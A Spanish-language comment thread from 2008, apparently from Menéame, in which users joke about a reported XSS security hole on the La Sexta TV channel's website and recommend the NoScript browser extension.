#7 Agujero de seguridad grave en La Sexta

--86920-- — Thu, 28 Aug 2008 20:23:25 +0000

[Usuario deshabilitado]

» autor: --86920--

#6 Agujero de seguridad grave en La Sexta

--93991-- — Thu, 28 Aug 2008 20:21:07 +0000

[Usuario deshabilitado]

» autor: --93991--

#5 Agujero de seguridad grave en La Sexta

--92646-- — Thu, 28 Aug 2008 20:18:12 +0000

No va a salir ahora el follonero riendose de la sexta? vaya pobreticos.

» autor: --92646--

#4 Agujero de seguridad grave en La Sexta

Hughthehand — Thu, 28 Aug 2008 20:17:05 +0000

Que se jodan, mas pirata que falsificar la wikipedia hay pocas cosas.

» autor: Hughthehand

#3 Agujero de seguridad grave en La Sexta

Abeel — Thu, 28 Aug 2008 20:15:29 +0000

Como soy fricky lo digo yo primero ... OWNED!

» autor: Abeel

#2 Agujero de seguridad grave en La Sexta

DZPM — Thu, 28 Aug 2008 20:14:58 +0000

Que suerte tengo de usar NoScript

NoScript es una extensión de Firefox que bloquea los ataques XSS, como este.
noscript.net/

Edit:
No es la primera vulnerabilidad gorda que les pillan: meneame.net/story/simpatico-hackeo-web-oficial-hicisteis

» autor: DZPM

#1 Agujero de seguridad grave en La Sexta

Kartoffel — Thu, 28 Aug 2008 20:14:21 +0000

¡Zas! ¡Con su propia medicina!

» autor: Kartoffel